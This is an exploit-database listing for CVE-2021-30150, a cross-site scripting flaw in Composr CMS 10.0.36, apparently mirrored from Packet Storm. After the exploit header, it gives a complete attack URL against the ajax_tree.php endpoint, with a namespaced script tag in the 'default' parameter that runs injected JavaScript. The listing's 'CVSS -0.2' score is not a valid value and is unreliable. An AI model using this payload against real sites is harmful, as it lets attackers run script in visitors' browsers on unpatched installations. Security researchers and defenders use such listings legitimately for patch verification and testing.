Exploit for Composr CMS 10.0.36 Cross Site Scripting CVE-2021-30150

Name: Exploit for Composr CMS 10.0.36 Cross Site Scripting CVE-2021-30150
Rating: 5 (184 reviews)

2021-04-07 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:162111
# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting  
# Date: 04/06/2021  
# Exploit Author: Orion Hridoy  
# Vendor Homepage: https://compo.sr/  
# Software Link: https://compo.sr/download.htm  
# Version: 10.0.36  
# Tested on: Windows/Linux  
# CVE : CVE-2021-30150  
  
Vulnerable Endpoint:  
https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>